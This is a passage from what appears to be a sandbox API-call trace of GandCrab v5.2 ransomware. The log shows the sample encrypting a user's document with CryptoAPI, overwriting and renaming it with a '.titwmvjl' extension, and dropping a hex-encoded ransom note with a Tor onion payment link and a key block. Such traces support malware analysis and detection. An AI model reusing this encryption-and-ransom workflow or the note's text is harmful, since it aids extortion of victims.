dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.165] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.166] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.166] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503638) returned 1 [0091.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.166] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.166] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.167] GetLastError () returned 0x0 [0091.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.167] CryptDestroyKey (hKey=0x503638) returned 1 [0091.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.167] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.167] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0091.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.168] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5035b8) returned 1 [0091.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.168] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0091.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.169] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0091.169] GetLastError () returned 0x0 [0091.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.169] CryptDestroyKey (hKey=0x5035b8) returned 1 [0091.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0091.169] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0091.169] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0091.169] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0091.170] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x4b4e, lpOverlapped=0x0) returned 1 [0091.181] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffb4b2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.181] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4b4e, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x4b4e, lpOverlapped=0x0) returned 1 [0091.182] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0091.183] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.187] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.187] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.187] CloseHandle (hObject=0x2ac) returned 1 [0091.190] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\JXW3nsm.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\jxw3nsm.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\JXW3nsm.pptx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\jxw3nsm.pptx.titwmvjl"), dwFlags=0x1) returned 1 [0091.190] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.191] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.191] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0091.191] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0091.191] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music" [0091.191] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\" [0091.191] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0091.191] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.191] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.191] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.191] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.192] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0091.192] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.192] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.192] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.192] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\\\TITWMVJL-DECRYPT.txt") returned 62 [0091.192] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\my music\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0091.193] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x